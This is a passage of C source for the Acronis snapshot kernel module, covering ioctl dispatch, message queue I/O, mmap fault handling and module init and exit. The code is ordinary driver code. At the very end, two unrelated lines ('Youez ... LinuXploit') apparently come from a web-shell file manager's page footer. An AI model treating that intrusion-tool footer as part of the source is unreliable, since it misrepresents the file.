	sa_kdebug("OK. kdev=%x:%x, bs=%d.\n", MAJOR(s->s_kdev), MINOR(s->s_kdev),
								s->s_bsize);
out:
	up(&s->s_sem);
	return ret;
}

static int session_messqstate(struct session_struct *s, unsigned int *state)
{
	int ret;
	unsigned int out;
	struct list_head *tmp;

	sa_debug(DEBUG_API,"s=%p\n", s);

	ret = -EFAULT;
	out = 0;
	down(&messages_sem);
	spin_lock(&sessions_lock);
	list_for_each(tmp, &sessions_list) {
		struct session_struct *sp;

		sp = list_entry(tmp, struct session_struct, s_list);
		/* one queue per device */
		sa_debug(DEBUG_API,"sp=%p, sp->mess_pos=%d, mess_pos=%d\n", sp,
					sp->s_mess_pos, messages_pos);
		if (sp->s_mess_pos != messages_pos) {
			out = 1;
			goto out_up;
		}
	}
	list_for_each(tmp, &notinited_list) {
		struct session_struct *sp;

		sp = list_entry(tmp, struct session_struct, s_list);
		/* one queue per device */
		sa_debug(DEBUG_API,"sp=%p, sp->mess_pos=%d, mess_pos=%d\n", sp,
					sp->s_mess_pos, messages_pos);
		if (sp->s_mess_pos != messages_pos) {
			out = 1;
			break;
		}
	}
out_up:
	spin_unlock(&sessions_lock);
	up(&messages_sem);
	if (copy_to_user(state, &out, sizeof(*state)))
		goto out;

	ret = 0;
out:
	return ret;
}

static struct inode* sn_get_inode(struct file *filep)
{
#ifdef HAVE_FILE_F_DENTRY
	return filep->f_dentry->d_inode;
#else
	return file_inode(filep);
#endif
}

static struct dentry* sn_get_dentry(struct file *filep)
{
#ifdef HAVE_FILE_F_DENTRY
	return filep->f_dentry;
#else
	return filep->f_path.dentry;
#endif
}

static int session_resetatime(struct session_struct *s, unsigned int fd)
{
	int ret;
	struct file *file;
	struct inode *inode;

	sa_debug(DEBUG_API,"s=%p\n", s);
	down(&s->s_sem);
	ret = -ESRCH;
	file = fget(fd);
	if (!file)
		goto out_up;
	if (!sn_get_dentry(file) || !sn_get_inode(file))
		goto out_put;
	inode = sn_get_inode(file);
	inode->i_flags |= S_NOATIME;
	ret = 0;
out_put:
	fput(file);
out_up:
	up(&s->s_sem);
	return ret;
}

static long snapapi3_ioctl(struct file *file, unsigned int cmd, unsigned long arg)
{
	int err;
	struct session_struct * ss;

	sa_debug(DEBUG_IOCTL, "cmd=%x\n", cmd);
	if (!snap_init_ok)
		return -EPERM;
	ss = file->private_data;
	if (!ss)
		return -EINVAL;
	err = -EFAULT;

	update_ioctl_counters(ss);

	switch (cmd) {
	    case SNAPCTL_INIT: {
			struct snapctl_init s;
			if (copy_from_user(&s, (void *)arg, sizeof(s)))
				break;
			err = session_init(ss, MKDEV(s.major, s.minor),
								s.prealloc);
		}
		break;
	    case SNAPCTL_FREEZE:
			err = session_freeze(ss);
		break;
	    case SNAPCTL_UNFREEZE:
			err = session_unfreeze(ss);
		break;
	    case SNAPCTL_GETMAP: {
			struct snapctl_getmap s;
			if (copy_from_user(&s, (void *)arg, sizeof(s)))
				break;
			err = session_getmap(ss, s.map_size, s.map,
					(unsigned long)s.bsize,
					(unsigned long)s.fblock,
					(unsigned long)s.bpgroup,
					(unsigned long)s.gcount);
		}
		break;
	    case SNAPCTL_GETSPARSEDMAP: {
			struct snapctl_getsparsedmap s;
			if (copy_from_user(&s, (void *)arg, sizeof(s)))
				break;
			err = session_getsparsedmap(ss, s.map_size, s.map,
					(unsigned long)s.bsize,
					(unsigned long)s.fblock,
					(unsigned long)s.bpgroup,
					(unsigned long)s.gcount,
					(unsigned long)s.groups);
		}
		break;
	    case SNAPCTL_LDMAP: {
			struct snapctl_ldmap s;
			if (copy_from_user(&s, (void *)arg, sizeof(s)))
				break;
			err = session_ldmap(ss, s.map_size, s.map);
		}
		break;
	    case SNAPCTL_GETBNO: {
			struct snapctl_getbno s;
			if (copy_from_user(&s, (void *)arg, sizeof(s)))
				break;
			err = session_getbno(ss, s.bno);
		}
		break;
	    case SNAPCTL_BFREE: {
			struct snapctl_bfree s;
			if (copy_from_user(&s, (void *)arg, sizeof(s)))
				break;
			err = session_bfree(ss, s.bstart, s.count);
		}
		break;
	    case SNAPCTL_BREAD: {
			struct snapctl_bread s;
			if (copy_from_user(&s, (void *)arg, sizeof(s)))
				break;
			err = session_bread(ss, s.bstart, s.count, s.data,
				s.flags,
				&(((struct snapctl_bread*)arg)->bincache));
		}
		break;
	    case SNAPCTL_STATE: {
			struct snapctl_state s;
			if (copy_from_user(&s, (void *)arg, sizeof(s)))
				break;
			err = session_state(ss, s.state, s.size);
		}
		break;
	    case SNAPCTL_DEVINFO: {
			struct snapctl_devinfo s;
			if (copy_from_user(&s, (void *)arg, sizeof(s)))
				break;
			err = session_devinfo(ss, MKDEV(s.major, s.minor),
								s.info, s.size);
		}
		break;
	    case SNAPCTL_DEVLOCK: {
			struct snapctl_devlock s;
			if (copy_from_user(&s, (void *)arg, sizeof(s)))
				break;
			err = session_lockdev(ss, MKDEV(s.major, s.minor), DL_WRITE);
		}
		break;
	    case SNAPCTL_DEVUNLOCK: {
			struct snapctl_devunlock s;
			if (copy_from_user(&s, (void *)arg, sizeof(s)))
				break;
			err = session_unlockdev(ss, MKDEV(s.major, s.minor), DL_WRITE);
		}
		break;
	    case SNAPCTL_DEVLOCKREAD: {
			struct snapctl_devlockread s;
			if (copy_from_user(&s, (void *)arg, sizeof(s)))
				break;
			err = session_lockdev(ss, MKDEV(s.major, s.minor), DL_READ);
		}
		break;
	    case SNAPCTL_DEVUNLOCKREAD: {
			struct snapctl_devunlockread s;
			if (copy_from_user(&s, (void *)arg, sizeof(s)))
				break;
			err = session_unlockdev(ss, MKDEV(s.major, s.minor), DL_READ);
		}
		break;
	    case SNAPCTL_MESSQSTATE: {
			struct snapctl_messqstate s;
			if (copy_from_user(&s, (void *)arg, sizeof(s)))
				break;
			err = session_messqstate(ss, s.state);
		}
		break;
	    case SNAPCTL_RESETATIME: {
			struct snapctl_resetatime s;
			if (copy_from_user(&s, (void *)arg, sizeof(s)))
				break;
			err = session_resetatime(ss, s.fd);
		}
		break;
	    case SNAPCTL_RDCACHE: {
			struct snapctl_rdcache s;
			if (copy_from_user(&s, (void *)arg, sizeof(s)))
				break;
			err = session_rdcache(ss, s.data, s.size);
		}
		break;
#ifdef USE_VZ_VZSNAP
	    case SNAPCTL_SET_VEID: {
			unsigned int s;
			if (copy_from_user(&s, (void *)arg, sizeof(s)))
				break;
			ss->s_veid = s;
			err = 0;
		}
		break;
#endif
	    default:
		err = -ENOTTY;
		break;
	}
	if (err)
		sa_debug(DEBUG_API, "cmd=%x err=%d\n", cmd, -err);
	return err;
}

#ifndef HAVE_UNLOCKED_IOCTL_IN_FS_H
static int snapapi4_ioctl(struct inode *ino, struct file *file, unsigned int cmd,
		unsigned long arg)
{
	return snapapi3_ioctl(file, cmd, arg);
}
#endif
#ifdef HAVE_IOCTL32_CONVERSION
static int
snapapi_compat_ioctl(unsigned int fd, unsigned int cmd,
			unsigned long arg, struct file *filep)
{
	sa_debug(DEBUG_IOCTL, "cmd=%x\n", cmd);
	return snapapi3_ioctl(filep, cmd, arg);
}
#endif

#ifdef HAVE_COMPAT_IOCTL
static long
snapapi_compat_ioctl(struct file *filep, unsigned int cmd,
			unsigned long arg)
{
	sa_debug(DEBUG_IOCTL, "cmd=%x\n", cmd);
	return snapapi3_ioctl(filep, cmd, arg);
}
#endif

static int snapapi_open(struct inode *ino, struct file *file)
{
	struct session_struct * s;

	sa_debug(DEBUG_API,"%s\n","enter");
	if (!snap_init_ok) {
		sa_warn("snapapi is not inited.%s", "\n");
		return -EPERM;
	}
	s = kmalloc(sizeof(*s), GFP_KERNEL);
	if (!s)
		return -ENOMEM;
	if (!try_module_get(THIS_MODULE)) {
		kfree(s);
		return -ENODEV;
	}
	memset(s, 0, sizeof(*s));
	INIT_LIST_HEAD(&s->s_list);
	sema_init(&s->s_sem, 1); /* unlocked state */
	s->s_heartbeat_active = 0;
	s->s_usemap = 0;
	spin_lock_init(&s->s_misc_lock);
	spin_lock_init(&s->s_biolist_lock);
	spin_lock_init(&s->s_blkcache_emlock);
	spin_lock_init(&s->s_pending_queue.pq_lock);
	spin_lock_init(&s->s_stat_lock);
	atomic_set(&s->s_users, 1);

	down(&messages_sem);
	s->s_mess_pos = messages_pos;
	up(&messages_sem);
	spin_lock(&sessions_lock);
	list_add(&s->s_list, &notinited_list);
	spin_unlock(&sessions_lock);

	file->private_data = s;
	sa_debug(DEBUG_API, "OK s=%p tgid=%d\n", s, current->tgid);
	return 0;
}

static int snapapi_release(struct inode *ino, struct file *file)
{
	struct session_struct * s;

	sa_debug(DEBUG_API,"%s\n","enter");
	s = file->private_data;
	if (!s)
		return -EINVAL;
	file->private_data = NULL;

	close_session(s, 1);
	module_put(THIS_MODULE);
	sa_debug(DEBUG_API, "OK s=%p tgid=%d\n", s, current->tgid);
	return 0;
}

#if LINUX_VERSION_CODE < KERNEL_VERSION(2,6,26)
#define SN_NOPAGE_SIGBUS NOPAGE_SIGBUS
#else
#define SN_NOPAGE_SIGBUS VM_FAULT_ERROR
#endif

static struct page * snapapi_vm_nopage(struct vm_area_struct * vma,
					unsigned long address, int *unused)
{
	unsigned int i;
	struct session_struct *s;

	if (!vma->vm_file) {
		sa_warn("vma does not have a file attached.%s", "\n");
		return (struct page *)SN_NOPAGE_SIGBUS;
	}
	s = vma->vm_file->private_data;
	sa_debug(DEBUG_API,"s=%p, vma=%p, address=%lx, pgoff=%lu\n", s, vma,
			address, vma->vm_pgoff);

	i = (address - vma->vm_start) >> PAGE_SHIFT;

	if (i >= s->s_msize) {
		sa_warn("Incorrect address.%s", "\n");
		return (struct page *)SN_NOPAGE_SIGBUS;
	}
	get_page(s->s_mpages[i]);
	sa_debug(DEBUG_ALLOC, "s=%p, nopage=%p(%d)\n", s, s->s_mpages[i],
					page_count(s->s_mpages[i]));

	return s->s_mpages[i];
}

#if LINUX_VERSION_CODE >= KERNEL_VERSION(2,6,26)
static VMFAULT_RETURN_VALUE snapapi_vm_fault(struct vm_area_struct * vma, struct vm_fault *vmf)
{
#ifdef HAVE_VMFAULT_VIRTUAL_ADDRESS
	unsigned long address = (unsigned long) vmf->virtual_address;
#else
	unsigned long address = (unsigned long) vmf->address;
#endif

#ifdef HAVE_VM_FAULT_2ARGS
	vmf->page = snapapi_vm_nopage(vma, address, 0);
#else
	vmf->page = snapapi_vm_nopage(vmf->vma, address, 0);
#endif
	if (vmf->page == (struct page *)SN_NOPAGE_SIGBUS)
		return VM_FAULT_ERROR;
	return 0;
}
#endif

static void snapapi_vm_open(struct vm_area_struct * vma)
{
	struct session_struct *s;

	if (!vma->vm_file) {
		sa_warn("vma does not have a file attached.%s", "\n");
		return;
	}
	s = vma->vm_file->private_data;
	sa_debug(DEBUG_API,"s=%p, vma=%p, users=%d\n", s, vma,
				atomic_read(&s->s_vma_users));
	atomic_inc(&s->s_vma_users);
}

static void snapapi_vm_close(struct vm_area_struct * vma)
{
	struct session_struct *s;

	if (!vma->vm_file) {
		sa_warn("vma does not have a file attached.%s", "\n");
		return;
	}
	s = vma->vm_file->private_data;
	sa_debug(DEBUG_API,"s=%p, vma=%p, users=%d\n", s, vma,
				atomic_read(&s->s_vma_users));
	if (!atomic_dec_and_test(&s->s_vma_users))
		return;

	s->s_vma = NULL;
	mpages_destroy(s);
}

static int snapapi_mmap(struct file * file, struct vm_area_struct * vma)
{
	struct session_struct *s;
	int ret, size;
	struct page * page;
	int i;

	s = file->private_data;
	sa_debug(DEBUG_API,"s=%p, vma=%p,%lx-%lx %lx %lx\n", s, vma,
						vma->vm_start, vma->vm_end,
						vma->vm_flags, vma->vm_pgoff);
	if (!s)
		return -EBADF;
	if (!(vma->vm_flags & VM_READ)
			|| (vma->vm_flags & VM_SHARED))
		return -EINVAL;

	ret = -EINVAL;
	down(&s->s_sem);
	if (s->s_vma || s->s_state < SNAP_INITED || vma->vm_pgoff != 0)
		goto out_up;

	ret = -ENOMEM;
	size = (vma->vm_end - vma->vm_start) >> PAGE_SHIFT;
	if (size > s->s_maxmsize || size < 1)
		goto out_up;

	s->s_msize = size; /* mmap size in pages */
	s->s_local_bios = kmalloc(sizeof(struct bio_req) * size, GFP_KERNEL);
	if (!s->s_local_bios)
		goto out_up;
	sa_debug(DEBUG_INTERNALS, "s=%p, mmap pages=%d, local_bios==%p\n", s,
						size, s->s_local_bios);
	memset(s->s_local_bios, 0, sizeof(struct bio_req) * size);

	for (i = 0; i < size; i++) {
		page = alloc_page(GFP_KERNEL);
		if (!page) {
			goto out_destroy;
		}
		inc_get_pages(s);
		s->s_mpages[i] = page;
		sa_debug(DEBUG_ALLOC, "s=%p, alloc page=%p(%d)\n", s,
				page, page_count(page));
	}
	ret = 0;
	s->s_vma = vma;
	vma->vm_ops = &snapctl_vm_ops;
	atomic_set(&s->s_vma_users, 1);
	goto out_up;

out_destroy:
	s->s_vma = NULL;
	mpages_destroy(s);
out_up:
	up(&s->s_sem);
	return ret;
}

static ssize_t snapapi_read(struct file * filp, char * buf, size_t count,
								loff_t *ppos)
{
	struct session_struct *s;
	ssize_t size, read, ret;
	int idx;

	s = filp->private_data;
	sa_debug(DEBUG_MESS, "s=%p, buf=%p, count=%lu, ppos=%lld\n", s,
				buf, (unsigned long)count, (long long)*ppos);
	if (!s)
		return -EBADF;
	if (count % MESSAGE_SIZE)
		return -EINVAL;
	if (*ppos != filp->f_pos)
		return -ESPIPE;
	/* Null write succeeds.  */
	if (count == 0)
		return 0;
	ret = -ERESTARTSYS;
	down(&s->s_sem);
	if (down_interruptible(&messages_sem))
		goto out_nolock;
	if (signal_pending(current))
		goto out;
	ret = 0;
	/* Always work in NONBLOCK mode */
	if (s->s_mess_pos == messages_pos)
		goto out;
	size = (messages_pos > s->s_mess_pos) ? messages_pos - s->s_mess_pos :
		MAX_MESSAGES - s->s_mess_pos + messages_pos;
	size *= MESSAGE_SIZE;
	if (size > count)
		size = count;
	idx = s->s_mess_pos + 1;
	read = 0;
	ret = -EFAULT;
	while (size > 0) {
		idx %= MAX_MESSAGES;
		if (copy_to_user(buf, &messages_buf[idx++], MESSAGE_SIZE))
			goto out;
		read += MESSAGE_SIZE;
		size -= MESSAGE_SIZE;
	}
	s->s_mess_pos = (idx - 1) % MAX_MESSAGES;
	ret = read;

out:
	up(&messages_sem);
out_nolock:
	up(&s->s_sem);
	return ret;
}

static ssize_t snapapi_write(struct file *filp, const char *buf, size_t count,
								loff_t *ppos)
{
	struct session_struct *s;
	int idx;
	ssize_t ret;

	s = filp->private_data;
	sa_debug(DEBUG_MESS,"s=%p, buf=%p, count=%lu, ppos=%lld, f_pos=%lld\n",
			s, buf, (unsigned long)count, *ppos, filp->f_pos);
	if (!s)
		return -EBADF;
	if (count != MESSAGE_SIZE)
		return -EINVAL;
	if (*ppos != filp->f_pos)
		return -ESPIPE;
	/* Null write succeeds.  */
	if (count == 0)
		return 0;
	ret = -ERESTARTSYS;
	down(&s->s_sem);
	if (down_interruptible(&messages_sem))
		goto out_nolock;
	if (signal_pending(current))
		goto out;
	ret = -EFAULT;
	idx = (messages_pos + 1) % MAX_MESSAGES;
	if (copy_from_user(&messages_buf[idx], buf, MESSAGE_SIZE))
		goto out;
	messages_pos = idx;
	ret =  MESSAGE_SIZE;
	/* Signal readers asynchronously that there is more data.  */
	sa_debug(DEBUG_MESS, "s=%p, wake_up_interruptible\n", s);
	wake_up_interruptible(&select_wait);

out:
	up(&messages_sem);
out_nolock:
	up(&s->s_sem);
	return ret;
}

static unsigned int snapapi_poll(struct file *filp, poll_table *wait)
{
	struct session_struct *s;
	unsigned int mask;

	s = filp->private_data;
	sa_debug(DEBUG_MESS, "s=%p\n", s);
	if (!s)
		return POLLERR;
	poll_wait(filp, &select_wait, wait);
	down(&s->s_sem);
	down(&messages_sem);
	mask = 0;
	if (s->s_mess_pos != messages_pos) {
		sa_debug(DEBUG_MESS,"s=%p, message ready\n", s);
		mask = POLLIN | POLLRDNORM;
	}
	up(&messages_sem);
	up(&s->s_sem);
	return mask;
}

static struct vm_operations_struct snapctl_vm_ops = {
	open:	snapapi_vm_open,
#if LINUX_VERSION_CODE < KERNEL_VERSION(2,6,26)
	nopage:	snapapi_vm_nopage,
#else
	fault:	snapapi_vm_fault,
#endif
	close:	snapapi_vm_close,
};

static struct file_operations snapctl_fops = {
#ifdef HAVE_UNLOCKED_IOCTL_IN_FS_H
	unlocked_ioctl: snapapi3_ioctl,
#else
	ioctl: snapapi4_ioctl,
#endif
	open: snapapi_open,
	read: snapapi_read,
	write: snapapi_write,
	poll: snapapi_poll,
	mmap:  snapapi_mmap,
	release: snapapi_release,
#ifdef HAVE_COMPAT_IOCTL
	compat_ioctl: snapapi_compat_ioctl,
#endif
};

static int snapctl_unload(void)
{
	unregister_chrdev(snapctl_major, SNAPCTL_NAME);
#ifdef HAVE_IOCTL32_CONVERSION
	unregister_ioctl32_conversion(SNAPCTL_INIT);
	unregister_ioctl32_conversion(SNAPCTL_FREEZE);
	unregister_ioctl32_conversion(SNAPCTL_LDMAP);
	unregister_ioctl32_conversion(SNAPCTL_GETMAP);
	unregister_ioctl32_conversion(SNAPCTL_GETBNO);
	unregister_ioctl32_conversion(SNAPCTL_BREAD);
	unregister_ioctl32_conversion(SNAPCTL_BFREE);
	unregister_ioctl32_conversion(SNAPCTL_STATE);
	unregister_ioctl32_conversion(SNAPCTL_DEVINFO);
	unregister_ioctl32_conversion(SNAPCTL_DEVLOCK);
	unregister_ioctl32_conversion(SNAPCTL_DEVUNLOCK);
	unregister_ioctl32_conversion(SNAPCTL_UNFREEZE);
	unregister_ioctl32_conversion(SNAPCTL_MESSQSTATE);
	unregister_ioctl32_conversion(SNAPCTL_RESETATIME);
	unregister_ioctl32_conversion(SNAPCTL_RDCACHE);
	unregister_ioctl32_conversion(SNAPCTL_SET_VEID);
	unregister_ioctl32_conversion(SNAPCTL_START_SWAP_THREAD);
	unregister_ioctl32_conversion(SNAPCTL_STOP_SWAP_THREAD);
	unregister_ioctl32_conversion(SNAPCTL_DEVLOCKREAD);
	unregister_ioctl32_conversion(SNAPCTL_DEVUNLOCKREAD);
#endif
	down(&devlocked_sem);
	if (devlocked) {
		free_page((unsigned long)devlocked);
		devlocked = NULL;
	}
	up(&devlocked_sem);
	down(&messages_sem);
	if (messages_buf) {
		free_page((unsigned long)messages_buf);
		messages_buf = NULL;
	}
	up(&messages_sem);
	if (pid_info_p) {
		free_page((unsigned long)pid_info_p);
		pid_info_p = NULL;
	}
	return 0;
}

static void stop_resolver_thread(void)
{
	resolver_thread_continue = 0;
	wmb();
#ifndef USE_KERNEL_THREAD
	wake_up_process(resolver_thread);
#else
	wake_up_interruptible(&resolver_thread_signal);
#endif
	wait_for_completion(&resolver_thread_exited);
}

static int __init snapapi_init(void)
{
	struct sysinfo i;
	int ret;
	ret = -ENOMEM;

	init_waitqueue_head(&select_wait);
	si_meminfo(&i);
	snap_emergency_size = i.totalram >> 8;

#ifndef USE_KERNEL_THREAD
	resolver_thread = kthread_create(resolver_loop, NULL, "snapapid");
	if (IS_ERR(resolver_thread)) {
		ret = IS_ERR(resolver_thread);
		goto out_info;
	}
	wake_up_process(resolver_thread);
#else
	resolver_thread_pid = kernel_thread(resolver_loop, NULL, 0);
	if (resolver_thread_pid < 0) {
		ret = resolver_thread_pid;
		goto out_info;
	}
#endif

	messages_buf = (struct snap_message *) get_zeroed_page(GFP_KERNEL);
	if (!messages_buf)
		goto err_mbuf;

	devlocked = (struct locked_dev *) get_zeroed_page(GFP_KERNEL);
	if (!devlocked)
		goto err_devl;

	pid_info_p = (struct sn_pid_info *) get_zeroed_page(GFP_KERNEL);
	if (!pid_info_p)
		goto err_pidinfo;

	snapctl_fops.owner = THIS_MODULE;
	ret = register_chrdev(0, SNAPCTL_NAME, &snapctl_fops);
	if (!ret)
		goto err_chrdev;
	snapctl_major = ret;
#ifdef HAVE_IOCTL32_CONVERSION
	register_ioctl32_conversion(SNAPCTL_INIT, snapapi_compat_ioctl);
	register_ioctl32_conversion(SNAPCTL_FREEZE, snapapi_compat_ioctl);
	register_ioctl32_conversion(SNAPCTL_LDMAP, snapapi_compat_ioctl);
	register_ioctl32_conversion(SNAPCTL_GETMAP, snapapi_compat_ioctl);
	register_ioctl32_conversion(SNAPCTL_GETBNO, snapapi_compat_ioctl);
	register_ioctl32_conversion(SNAPCTL_BREAD, snapapi_compat_ioctl);
	register_ioctl32_conversion(SNAPCTL_BFREE, snapapi_compat_ioctl);
	register_ioctl32_conversion(SNAPCTL_STATE, snapapi_compat_ioctl);
	register_ioctl32_conversion(SNAPCTL_DEVINFO, snapapi_compat_ioctl);
	register_ioctl32_conversion(SNAPCTL_DEVLOCK, snapapi_compat_ioctl);
	register_ioctl32_conversion(SNAPCTL_DEVUNLOCK, snapapi_compat_ioctl);
	register_ioctl32_conversion(SNAPCTL_UNFREEZE, snapapi_compat_ioctl);
	register_ioctl32_conversion(SNAPCTL_MESSQSTATE, snapapi_compat_ioctl);
	register_ioctl32_conversion(SNAPCTL_RESETATIME, snapapi_compat_ioctl);
	register_ioctl32_conversion(SNAPCTL_RDCACHE, snapapi_compat_ioctl);
	register_ioctl32_conversion(SNAPCTL_SET_VEID, snapapi_compat_ioctl);
	register_ioctl32_conversion(SNAPCTL_START_SWAP_THREAD, snapapi_compat_ioctl);
	register_ioctl32_conversion(SNAPCTL_STOP_SWAP_THREAD, snapapi_compat_ioctl);
	register_ioctl32_conversion(SNAPCTL_DEVLOCKREAD, snapapi_compat_ioctl);
	register_ioctl32_conversion(SNAPCTL_DEVUNLOCKREAD, snapapi_compat_ioctl);
#endif
	snap_init_ok = 1;
	ret = 0;

out_info:
	sa_info("Snapapi(v.%d.%d.%d) init %s. Session size %d. Em size %d. "
		"Ctl major %d. chains %d\n", SNAPAPI_VMAJOR, SNAPAPI_VMINOR, SNAPAPI_VSUBMINOR,
		snap_init_ok ? "OK" : "failed",	(int)sizeof(struct session_struct),
		snap_emergency_size, snapctl_major, (int)BLK_CHAINS);
#ifdef HAVE_BDOPS_SUBMIT_BIO
	sa_warn("snapapi26: built for %s kernel using %s.", UTS_RELEASE, SNAPAPI_SYSTEM_MAP);
	if (validate_kernel_version() != 0)
		sa_warn("snapapi26 module was built for another kernel, have %s expecting %s.", utsname()->release, UTS_RELEASE);
#endif
	return ret;

err_chrdev:
	free_page((unsigned long)pid_info_p);
err_pidinfo:
	free_page((unsigned long)devlocked);
err_devl:
	free_page((unsigned long)messages_buf);
err_mbuf:
	stop_resolver_thread();
	goto out_info;
}

static void __exit snapapi_exit(void)
{
	snapctl_unload();
	stop_resolver_thread();
	sa_info("Snapapi unloading...%s", "\n");
}

module_init(snapapi_init);
module_exit(snapapi_exit);
MODULE_AUTHOR("Acronis");
MODULE_DESCRIPTION("Acronis Snapshot kernel API module");
MODULE_LICENSE("GPL");
MODULE_VERSION(SNAPAPI_COMMON_MOD_VERSION);
MODULE_INFO(supported, "external");

Youez - 2016 - github.com/yon3zu
LinuXploit